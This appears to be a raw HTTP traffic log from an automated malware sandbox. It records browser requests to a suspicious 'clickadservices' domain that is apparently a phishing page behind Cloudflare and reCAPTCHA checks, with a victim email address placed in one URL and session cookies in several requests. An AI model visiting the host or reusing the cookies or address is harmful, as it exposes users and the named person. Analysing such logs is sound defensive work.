      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/880b6b356a282766/1715191956873/EUH-Q4aQROypa1l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/880b6b356a282766/1715191956877/5f91988cb904a772a0d7013b0eebdf49616ba81fc4a186eda4e2c4c46e2c8d0b/vUcqapM6Nl_iDO3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /7FF88B1/ HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN1T3N4dU9rZEcyVy94Sk5zd3hFcEE9PSIsInZhbHVlIjoianNqTWUrWlJpay9SNHp1eHZGRndBQVNrb1pwWmIwRFQ4M3BoZFlqYy9pbE8zQWhJZnNGQnpDWXRjZytoZkpvS1NYRmJ2YUZrZkx4cURUazVyYUdQVHB6S0ZtY0NDek9Ec0tkRFF2a0N6K2c2S1NoVjlLblNJL25jQ0gvZnRzTVQiLCJtYWMiOiI5NmRlNjgwNGE4Nzk5NDViMzM3NTQ4Mzg5NDA5YTlkNDFmNmU0OTIzOGM3ZDRjYWU3ZTE4NGYxMGZhNzQ0NTJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBkTWp0enlOQzVETlNQbnExVTN4UHc9PSIsInZhbHVlIjoicVhXTlpVMjRNb2s4UjdYeTUvMEhzMWhkTXN2R2Z0L3oyNXJPU2RkSWdWZWp2WGVFZFN3NGxMTDlCRENqRS9DRDdoRTBFcWtvUy9tU1IzVStyYjcrRTYvVVFIVWlUL0pMTGFSWW45UWNiUm85dFhkZ1ZDVytDTDBrUzUwZXhNcGYiLCJtYWMiOiJmMTZmMGY2NzQ1ODNhMTI3MjE3YjAxOGRjNjcxMWYzNmE1ZjYyNjdiYzdiZTZmODM4MTZkNzY5YmY2YzUxY2I0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /zu1fyxZK9POg2bBgIN1dk26NB5O25su HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImN1T3N4dU9rZEcyVy94Sk5zd3hFcEE9PSIsInZhbHVlIjoianNqTWUrWlJpay9SNHp1eHZGRndBQVNrb1pwWmIwRFQ4M3BoZFlqYy9pbE8zQWhJZnNGQnpDWXRjZytoZkpvS1NYRmJ2YUZrZkx4cURUazVyYUdQVHB6S0ZtY0NDek9Ec0tkRFF2a0N6K2c2S1NoVjlLblNJL25jQ0gvZnRzTVQiLCJtYWMiOiI5NmRlNjgwNGE4Nzk5NDViMzM3NTQ4Mzg5NDA5YTlkNDFmNmU0OTIzOGM3ZDRjYWU3ZTE4NGYxMGZhNzQ0NTJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBkTWp0enlOQzVETlNQbnExVTN4UHc9PSIsInZhbHVlIjoicVhXTlpVMjRNb2s4UjdYeTUvMEhzMWhkTXN2R2Z0L3oyNXJPU2RkSWdWZWp2WGVFZFN3NGxMTDlCRENqRS9DRDdoRTBFcWtvUy9tU1IzVStyYjcrRTYvVVFIVWlUL0pMTGFSWW45UWNiUm85dFhkZ1ZDVytDTDBrUzUwZXhNcGYiLCJtYWMiOiJmMTZmMGY2NzQ1ODNhMTI3MjE3YjAxOGRjNjcxMWYzNmE1ZjYyNjdiYzdiZTZmODM4MTZkNzY5YmY2YzUxY2I0IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /7FF88B1/?jHmmclaughlin@scs.edu HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjExeTZES0xrOXQybVJTL04vaW1NeFE9PSIsInZhbHVlIjoidnFZRE4yUDFWU0l2MkhHa293cmQwRUg1ak1oalpHMW9NQ0VZOUJEZDEzWDRsZkhiM1JCbjhKR01rRnZ2OWJUa2ttK1d1Z3ZyNVUrQVZnbjlKd0w3ZFJPbjkyeW1UeGMxZG00Zk1OU29ycTNQOVRvYm8wOTR3UktQTmgwYXJoVWQiLCJtYWMiOiJkNTQyMGM5YTk3NjViMmZjNjUzN2IyOTk5MTI2M2Y4ODViM2EwYWRjOWU1NWUzNmU1NDgxY2ExMjJkZjBkYzY2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9sU253dnE3MGtxK2c5bjdHM3dsTnc9PSIsInZhbHVlIjoiMmp2SmY1cXQvalMyQ2k4MkZ6N01wdmZkU2pxRlBMQUFZQ29uTDlwVXNFTnhnREQ0akFSS0RNS2ViMGRtRVI4eEhjY1JhUEQwVEozeGRhQWRuU25GNzBpbnZKZjdmc0lERjBzUUdJRmcvQlVmRVZMSmFpYkR0eklGU0lpbHBScDgiLCJtYWMiOiJlODU3NDA2ZWEwNDJmMzI5YmFiYzc3YzgwMmM2MTVlYzMwN2MwZWU3NDMyMjc2MmE4ZWE3MTM0NzE5NTI1YTVhIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRwUk5tNlRuVE9BMHNuYnRWRm5CSnc9PSIsInZhbHVlIjoiTVFRM1dWQnRqaEExaTV3ZFYrQjlKazkwN2Q0WUxBSFMxaTJlRC9uL3lCS3g0QWtYVllaZFFtT2xKYVcwOU9ZdVV6Z08vRjZzaDNCb0pkbUNTZVNzRG1qdy9qdmY0ZzVSZGFhZGNtVWsvTXdWeldvcEpYZXNlQWRWZkdkRzdUL2kiLCJtYWMiOiIzNjVlM2RkODcyZWM0NGFiZDU3NDJmODdiNzVlZjY5MGZjYTE3MWFiOGM0NjZlODI5YzIzMjk5ZmYzMjQyNWI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpkZVA5c0xkTWhScVlEejNLUVg2enc9PSIsInZhbHVlIjoibjhMVWhaRXRJTzRUNkZKS3ZPcC9xOUswMnY1a3Fsdi9BMlN1YUFWby9kcU16S1JTY0lqT2diWklOOUhIYmk0dTZ4TFpkeC9ZRWxNK1EzcTkxSlJoNnpnMmVKemJXVHhtNDRXckREZDhvL1ppcUhuVkcwbkJ0S2JDODFTNloxbEMiLCJtYWMiOiI2ZDllNzc4MTkwNDE3ODM3NDUzODY1MWI1ZDZiMmVkYTUxZWRkZTc5MzkyMTUzNDhlZjY3NzcxMzZjMWExYzI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=tr4Mf1t3WFAGUHw&MD=GGGn5gAy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficHTTP traffic detected: GET /56AdOYKMMLgoJxyRlCwu18915 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /xynV5WTpq6pef30 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /rsDaFFHlAZCVklAUguHuyzvbqKJluv31 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /12WoOwl2EBsyE56UvkVt2kJop49 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /23FMnyUutKWXvsdabgp1irvw70 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /56GlYvF8v8vmR1Rn676aHEust55 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
